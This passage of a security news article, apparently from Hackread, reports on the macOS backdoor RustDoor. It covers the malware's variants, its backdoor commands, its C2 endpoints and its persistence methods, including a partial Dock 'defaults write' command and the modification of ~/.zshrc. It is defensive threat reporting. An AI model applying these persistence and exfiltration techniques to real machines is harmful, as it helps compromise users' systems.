The second variant, found on 30th November 2023, is an upgraded version of the malware, containing a complex JSON configuration and an embedded Apple script for data exfiltration. The script is used to exfiltrate documents with specific extensions and sizes from Documents and Desktop folders, as well as user notes stored in SQLite format.

Variant Zero, discovered on 2nd February 2024, is the least complex variant, lacking Apple script and embedded configuration, despite its backdoor functionality.

All samples contain the backdoor functionality, with supported commands such as ps, shell, cd, mkdir, rm, rmdir, sleep, upload, botkill, dialog, taskkill, and download. These commands allow the malware to gather and upload files and gather information about the machine.

Additionally, the information extracted with the sysctl command and the output of two other commands (pwd and hostname) are submitted to the Register endpoint of the C&C server to receive a Victim ID.

According to Bitdefender’s blog post, communication with the C2 servers is performed using endpoints such as POST /gateway/register, POST /gateway/report, /gateway/task, and /tasks/upload\_file. The C2 servers are currently answering with “detail”: “Not found.”

Trojan.MAC.RustDoor is a malware family that employs multiple persistence mechanisms, including lock\_in\_cron, lock\_in\_launch, lock\_in\_dock, and lock\_in\_rc. These methods are common in recent malware families but not as popular. Lock\_in\_cron involves using cronjobs, while lock\_in\_launch uses LaunchAgents to execute the binary every time a user logs in.

Lock\_in\_rc is achieved by modifying the ~/.zshrc file to execute the binary every time a new ZSH session is opened. Lock\_in\_dock is achieved by adding the binary to the Dock using the command defaults write com.apple.dock persistent-apps -array-add.

This is an ongoing research. Hackread.com will update readers when new details are shared regarding the likely threat actors behind this operation.

****RELATED ARTICLES****

1.  **Bluetooth Flaw Enables Keystroke Injection on macOS, iOS**
2.  **New JaskaGO Malware Targets Mac for Crypto, Browser Data**
3.  **Lazarus Group uses KandyKorn macOS malware for crypto theft**
4.  **Cracked macOS Software Laced with New Trojan Proxy Malware**
5.  **New Malware Turns Windows and macOS Devices into Proxy Nodes**

Tag

#chrome